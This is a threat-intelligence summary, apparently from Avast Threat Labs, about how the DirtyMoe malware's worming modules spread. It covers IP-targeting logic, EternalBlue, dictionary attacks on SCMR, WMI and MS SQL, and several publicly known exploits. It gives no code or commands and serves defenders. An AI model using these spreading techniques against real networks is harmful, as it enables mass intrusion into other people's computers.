The primary goal of this research was to analyze one of the DirtyMoe module groups, which provides the spreading of the DirtyMoe malware using worming techniques. The second aim of this study was to investigate the effects of worming and investigate which exploits are in use. 

In most cases, DirtyMoe is deployed using external exploit kits like PurpleFox or injected installers of Telegram Messenger that require user interaction to successful infiltration. Importantly, worming is controlled by C&C and executed by active DirtyMoe instances, so user interaction is not required.

Worming target IPs are generated utilizing the cleverly designed algorithm that evenly generates IP addresses across the world and in relation to the geological location of the worming module. Moreover, the module targets local/home networks. Because of this, public IPs and even private networks behind firewalls are at risk.

Victims’ active machines are attacked using EternalBlue exploits and dictionary attacks aimed at SCMR, WMI, and MS SQL services with weak passwords. Additionally, we have detected a total of six vulnerabilities abused by the worming module that implement publicly disclosed exploits.

We also discovered one worming module in development containing other vulnerability exploit implementations – it did not appear to be fully armed for deployment. However, there is a chance that tested exploits are already implemented and are spreading in the wild. 

Based on the amount of active DirtyMoe instances, it can be argued that worming can threaten hundreds of thousands of computers per day. Furthermore, new vulnerabilities, such as Log4j, provide a tremendous and powerful opportunity to implement a new worming module. With this in mind, our researchers continue to monitor the worming activities and hunt for other worming modules.


CVE-2019-1458: “WizardOpium’ Local Privilege Escalation

SMB worming modules

SQL worming modules

Worming modules in development


[1] Malicious Telegram Installer Drops Purple Fox Rootkit
[2] Purple Fox Rootkit Now Propagates as a Worm
[3] Exploit-db: ‘EternalBlue’ SMB Remote Code Execution (MS17-010)
[4] Threat Spotlight: The Shadow Brokers and EternalPulsar Malware
[5] Service Control Manager Remote Protocol
[6] Windows Management Instrumentation
[7] Exploit-db: ThinkPHP – Multiple PHP Injection RCEs (Metasploit)
[8] Exploit-db: Deserialization Vulnerability
[9] Exploit-db: ‘AsyncResponseService’ Deserialization RCE (Metasploit)

The post DirtyMoe: Worming Modules appeared first on Avast Threat Labs.